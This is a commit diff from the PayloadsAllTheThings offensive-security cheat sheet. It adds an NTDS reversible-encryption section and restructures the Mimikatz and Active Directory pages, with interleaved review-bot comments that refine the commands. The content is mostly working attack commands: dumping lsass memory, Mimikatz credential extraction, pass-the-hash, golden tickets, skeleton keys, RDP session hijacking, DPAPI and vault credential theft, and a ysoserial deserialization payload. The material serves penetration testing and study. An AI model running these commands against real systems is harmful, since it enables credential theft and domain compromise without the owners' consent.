mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 10:38:45 +00:00
NTDS Reversible Encryption
This commit is contained in:
parent
4ca065f8ed
commit
5966c3a21b
3 changed files with 82 additions and 53 deletions
@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||||
|
|
||||||
### JSON.NET
|
### JSON.NET
|
||||||
|
|
||||||
|
* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
|
||||||
* Payload output: **JSON**
|
* Payload output: **JSON**
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
|
|
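Review bot: the new JSON.NET bullet breaks off mid-expression (`JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings` has no closing brace or parenthesis) and never says which setting makes that call exploitable. Complete the grep pattern and name the trigger, e.g. `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All })`, and add one clause stating that any `TypeNameHandling` value other than `None` is what lets an attacker-supplied `$type` pick the gadget class that the ysoserial JSON payload below relies on.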
@ -40,6 +40,7 @@
|
||||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
||||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||||
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
||||||
|
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
||||||
- [User Hunting](#user-hunting)
|
- [User Hunting](#user-hunting)
|
||||||
- [Password spraying](#password-spraying)
|
- [Password spraying](#password-spraying)
|
||||||
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
|
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
|
||||||
|
@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
|
||||||
|
|
||||||
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
||||||
|
|
||||||
```powershell
|
* RPCClient
|
||||||
# remote
|
```powershell
|
||||||
rpcclient $> lookupnames john.smith
|
rpcclient $> lookupnames john.smith
|
||||||
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
||||||
|
```
|
||||||
# loc
|
* WMI
|
||||||
wmic useraccount get name,sid
|
```powershell
|
||||||
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
wmic useraccount get name,sid
|
||||||
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
||||||
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
||||||
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
||||||
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
||||||
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
||||||
|
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
||||||
# powerview
|
```
|
||||||
Convert-NameToSid high-sec-corp.localkrbtgt
|
* Powerview
|
||||||
S-1-5-21-2941561648-383941485-1389968811-502
|
```powershell
|
||||||
```
|
Convert-NameToSid high-sec-corp.localkrbtgt
|
||||||
|
S-1-5-21-2941561648-383941485-1389968811-502
|
||||||
|
```
|
||||||
|
* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||||
|
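Review bot: `Convert-NameToSid high-sec-corp.localkrbtgt` (copied unchanged into the new PowerView block) has lost the backslash between domain and account; inside the fence it must read `Convert-NameToSid high-sec-corp.local\krbtgt`, otherwise readers copy a name that does not resolve. Two smaller points while the block is being split into per-tool bullets: the RPCClient fence is tagged `powershell` although `rpcclient` is a Samba tool run from a Linux shell (tag it `bash`, matching the kekeo block that follows), and `wmic` is deprecated and removed from current Windows builds, so it is worth adding the PowerShell equivalent `Get-CimInstance Win32_UserAccount | Select-Object Name, SID` next to it. Also "Powerview" is spelled `PowerView` elsewhere in this file.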
@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
|
||||||
- [crackstation.net](https://crackstation.net)
|
- [crackstation.net](https://crackstation.net)
|
||||||
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
||||||
|
|
||||||
|
|
||||||
|
#### NTDS Reversible Encryption
|
||||||
|
|
||||||
|
`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
|
||||||
|
|
||||||
|
The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
|
||||||
|
This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
|
||||||
|
|
||||||
|
* List users with "Store passwords using reversible encryption" enabled
|
||||||
|
```powershell
|
||||||
|
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
|
||||||
|
```
|
||||||
|
|
||||||
|
The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT.
|
||||||
|
|
||||||
|
|
||||||
### User Hunting
|
### User Hunting
|
||||||
|
|
||||||
Sometimes you need to find a machine where a specific user is logged in.
|
Sometimes you need to find a machine where a specific user is logged in.
|
||||||
|
|
|
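Review bot: the new section is added as `#### NTDS Reversible Encryption` while its neighbour `### User Hunting` is level 3 and the table of contents lists the new entry at the same level as the other `###` sections; use `###` so the outline and the `#ntds-reversible-encryption` anchor stay consistent. On the wording, "This means the hashes can be trivially reversed to the cleartext values" is inaccurate: with this flag no hash is involved at all, the attribute holds the password itself encrypted (RC4 keyed from the SYSKEY-protected PEK), so say that the stored value can be decrypted back to the cleartext password. Two caveats a reader will need: the flag only affects passwords set or changed after it was enabled, so an account that shows bit 0x80 but has not changed its password since has nothing to recover, and the same behaviour can be switched on for every account by the domain password policy ("Store passwords using reversible encryption") without the per-user `userAccountControl` bit being set, so the `Get-ADUser -Filter 'userAccountControl -band 128'` query is not a complete inventory. For tooling that speaks raw LDAP the equivalent filter is `(userAccountControl:1.2.840.113556.1.4.803:=128)`.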
@ -2,25 +2,25 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Mimikatz - Execute commands](#mimikatz---execute-commands)
|
* [Execute commands](#execute-commands)
|
||||||
* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
|
* [Extract passwords](#extract-passwords)
|
||||||
* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
|
* [LSA Protection Workaround](#lsa-protection-workaround)
|
||||||
* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
|
* [Mini Dump](#mini-dump)
|
||||||
* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
|
* [Pass The Hash](#pass-the-hash)
|
||||||
* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
|
* [Golden ticket](#golden-ticket)
|
||||||
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
* [Skeleton key](#skeleton-key)
|
||||||
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
* [RDP session takeover](#rdp-session-takeover)
|
||||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
* [Credential Manager & DPAPI](#credential-manager--dpapi)
|
||||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||||
* [Vault](#vault)
|
* [Vault](#vault)
|
||||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
* [Commands list](#commands-list)
|
||||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
* [Powershell version](#powershell-version)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
||||||
|
|
||||||
## Mimikatz - Execute commands
|
## Execute commands
|
||||||
|
|
||||||
Only one command
|
Only one command
|
||||||
|
|
||||||
|
@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords
|
||||||
mimikatz # sekurlsa::wdigest
|
mimikatz # sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Extract passwords
|
## Extract passwords
|
||||||
|
|
||||||
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||||
|
|
||||||
|
@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
* Adding requires lock
|
* Adding requires lock
|
||||||
* Removing requires reboot
|
* Removing requires reboot
|
||||||
|
|
||||||
## Mimikatz - LSA Protection Workaround
|
## LSA Protection Workaround
|
||||||
|
|
||||||
- LSA as a Protected Process (RunAsPPL)
|
- LSA as a Protected Process (RunAsPPL)
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Mini Dump
|
## Mini Dump
|
||||||
|
|
||||||
Dump the lsass process with `procdump`
|
Dump the lsass process with `procdump`
|
||||||
|
|
||||||
|
@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Use the minidump:
|
||||||
|
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
|
||||||
|
```powershell
|
||||||
|
mimikatz # sekurlsa::minidump lsass.dmp
|
||||||
|
mimikatz # sekurlsa::logonPasswords
|
||||||
|
```
|
||||||
|
* Pypykatz: `pypykatz lsa minidump lsass.dmp`
|
||||||
|
|
||||||
Then load it inside Mimikatz.
|
|
||||||
|
|
||||||
```powershell
|
## Pass The Hash
|
||||||
mimikatz # sekurlsa::minidump lsass.dmp
|
|
||||||
Switch to minidump
|
|
||||||
mimikatz # sekurlsa::logonPasswords
|
|
||||||
```
|
|
||||||
|
|
||||||
## Mimikatz - Pass The Hash
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
|
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Golden ticket
|
## Golden ticket
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
||||||
|
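Review bot: the one-liner `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` only switches mimikatz to the dump and then drops to the interactive prompt without extracting anything; the fenced block right below it shows the missing `sekurlsa::logonPasswords` step. Make the bullet self-sufficient so that the two agree, e.g. `.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit`. For the pypykatz bullet, one clause saying why it is listed as an alternative (a Python implementation that parses the dump off the Windows host, so the dump can be analysed from Linux) would make the choice between the two clear.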
@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15
|
||||||
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Skeleton key
|
## Skeleton key
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
privilege::debug
|
privilege::debug
|
||||||
|
@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
||||||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - RDP session takeover
|
## RDP session takeover
|
||||||
|
|
||||||
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
||||||
|
|
||||||
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
|
* Enable privileges
|
||||||
|
```powershell
|
||||||
|
privilege::debug
|
||||||
|
token::elevate
|
||||||
|
```
|
||||||
|
* List RDP sessions
|
||||||
|
```powershell
|
||||||
|
ts::sessions
|
||||||
|
```
|
||||||
|
* Hijack session
|
||||||
|
```powershell
|
||||||
|
ts::remote /id:2
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
|
||||||
privilege::debug
|
|
||||||
token::elevate
|
|
||||||
ts::remote /id:2
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# get the Session ID you want to hijack
|
# get the Session ID you want to hijack
|
||||||
|
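Review bot: `ts::remote /id:2` under "Hijack session" hardcodes an id that only makes sense after reading the `ts::sessions` output from the previous step; say so in the bullet (for example "replace 2 with the ID of the disconnected session listed by `ts::sessions`") so the value is not copied literally, and note that `token::elevate` is there because `ts::remote` needs SYSTEM. The moved sentence "Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password." still introduces the `# get the Session ID you want to hijack` / `net start sesshijack` block that follows it, so keep it directly above that block and make it a proper sentence, e.g. "Alternatively, run `tscon.exe` as SYSTEM: it connects to any session without a password."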
@ -188,7 +196,7 @@ net start sesshijack
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Credential Manager & DPAPI
|
## Credential Manager & DPAPI
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# check the folder to find credentials
|
# check the folder to find credentials
|
||||||
|
@ -235,7 +243,7 @@ Attributes : 0
|
||||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Commands list
|
## Commands list
|
||||||
|
|
||||||
| Command |Definition|
|
| Command |Definition|
|
||||||
|:----------------:|:---------------|
|
|:----------------:|:---------------|
|
||||||
|
@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
||||||
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
||||||
|
|
||||||
## Mimikatz - Powershell version
|
## Powershell version
|
||||||
|
|
||||||
Mimikatz in memory (no binary on disk) with :
|
Mimikatz in memory (no binary on disk) with :
|
||||||
|
|
||||||
|
|